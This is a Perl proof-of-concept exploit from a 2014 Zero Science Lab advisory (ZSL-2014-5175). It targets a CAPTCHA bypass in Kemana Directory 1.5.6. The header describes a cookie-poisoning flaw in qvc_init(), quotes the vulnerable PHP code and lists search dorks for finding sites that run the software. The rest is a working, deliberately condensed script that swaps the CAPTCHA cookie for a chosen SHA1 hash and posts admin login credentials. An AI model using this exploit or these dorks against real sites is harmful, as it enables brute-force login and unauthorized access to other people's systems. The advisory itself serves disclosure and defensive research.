#!C:\Perl64\bin\perl.exe
#
# Kemana Directory 1.5.6 (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit
#
#
# Vendor: C97net
# Product web page: http://www.c97.net
# Affected version: 1.5.6
#
# Summary: Experience the ultimate directory script solution with Kemana.
# Create your own Yahoo or Dmoz easily with Kemana. Unique Kemana's features
# including: CMS engine based on our qEngine, multiple directories support,
# user friendly administration control panel, easy to use custom fields,
# unsurpassed flexibility.
#
# Desc: The CAPTCHA function for Kemana Directory is prone to a security
# bypass vulnerability that occurs in the CAPTCHA authentication routine.
# The function 'qvc_init()' in '/includes/function.php' sets a cookie with
# a SHA1-based hash value in the Response Header which can be replaced by
# a random SHA1 computed hash value using Cookie Poisoning attack. Successful
# exploit will allow attackers to bypass the CAPTCHA-based authentication
# challenge and perform brute-force attacks.
#
#
# =============================================================================
# /includes/function.php:
# -----------------------
#
# 1774: /*------- ( QVC - VISUAL CONFIRMATION FUNCTIONS aka CAPTCHA ) ------- */
# 1775:
# 1776:
# 1777: // qVC - the simplest visual confirmation engine yet
# 1778: // use qvc_init() --> <img src="visual.php"> --> compare qvc_value() == sha1 (strtolower($user_input) )?
# 1779: // qVC uses db to communicate with visual.php, then set user cookie using sha1, then db not used!
# 1780: // $num = either 3 or 5, 3 => only 0-9, 5 => 0-F
# 1781: function qvc_init ($num = 5)
# 1782: {
# 1783: if ($num == 3)
# 1784: $value = mt_rand (100, 999);
# 1785: else
# 1786: $value = random_str (5);
# 1787: ip_config_update ('visual', $value);
# 1788: setcookie ('qvc_value', sha1 ($value), 0, '/');
# 1789: }
# 1790:
# 1791:
# 1792: // return qvc value (it's sha1'd, so be sure to compare with sha1'd value)
# 1793: function qvc_value ()
# 1794: {
# 1795: $correct_val = cookie_param ('qvc_value');
# 1796:
# 1797: // block browser BACK
# 1798: qvc_init ();
# 1799: return $correct_val;
# 1800: }
# =============================================================================
#
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
# Apache/2.4.7 (Win32)
# PHP/5.5.6
# MySQL 5.6.14
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2014-5175
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5175.php
#
#
# Dork #1: intitle:powered by c97.net
# Dork #2: intitle:powered by qEngine
# Dork #3: intitle:powered by Kemana.c97.net
# Dork #4: intitle:powered by Cart2.c97.net
#
#
# 08.03.2014
#
use LWP::UserAgent;use HTTP::Cookies;use HTTP::Request::Common;use Digest::SHA;info();#2014-03
$url="http://localhost/kemana/admin/login.php";$domain="localhost.local";$juzer="admin";$pass=
"admin";$cookie_jar=HTTP::Cookies->new();$ua=LWP::UserAgent->new;$ua->cookie_jar($cookie_jar);
print" [*] Sending request.\n";sleep(1);$request=GET $url;$response=$ua->request($request);#$_
print" [*] Reading cookie from Response Headers.\n";$cookie_jar->extract_cookies($response);#1
print" [*] ".$cookie_jar->as_string();sleep(1);$kuki=$cookie_jar->as_string;($regexp)=$kuki#].
=~/qvc_value=(.*?);/;print" [*] Got CAPTCHA: ".$regexp."\n";$sha=Digest::SHA->new();$data=#(";
"joxypoxy";$sha->add($data);$digest=$sha->hexdigest;print" [*] Poisoning with: ".$digest."\n";
$cookie_jar->set_cookie(0,'qvc_value',$digest,'/',$domain);print" [*] ".$cookie_jar->as_string
;sleep(1);print" [*] Sending login credentials.\n";$postche=$ua->request(POST $url,[user_id=>$
juzer,user_passwd=>$pass,visual=>$data]);print"\n";$check=$postche->as_string;if($check=~#get;
"HTTP/1.1 302 Found"){print" [*] CAPTCHA bypassed!\n";}else{print" [!] Didn\'t work.\n";}sub#\
info(){print"
+-----------------------------------------------------+
| |
| Kemana Directory CAPTCHA Bypass PoC Exploit |
| |
| ID: ZSL-2014-5175 |
| |
+-----------------------------------------------------+
\n\n";}
